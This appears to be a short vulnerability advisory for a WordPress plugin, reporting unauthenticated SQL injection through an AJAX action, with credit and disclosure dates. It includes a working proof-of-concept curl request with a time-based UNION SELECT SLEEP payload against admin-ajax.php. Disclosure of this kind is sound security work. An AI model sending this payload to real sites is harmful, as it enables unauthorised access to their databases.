The plugin does not validate, sanitise and escape various user inputs before using them in SQL statements via AJAX actions (available to both unauthenticated and authenticated users), leading to Unauthenticated SQL Injections
curl https://example.com/wp-admin/admin-ajax.php --data '0=images+UNION+SELECT+1+from+wp_users+WHERE+1+%3d+(SELECT+SLEEP(1))+--+&1=.&action=processGroup'
cydave
cydave
Yes
2022-04-11 (about 1 years ago)
2022-04-11 (about 1 years ago)
2022-04-17 (about 1 years ago)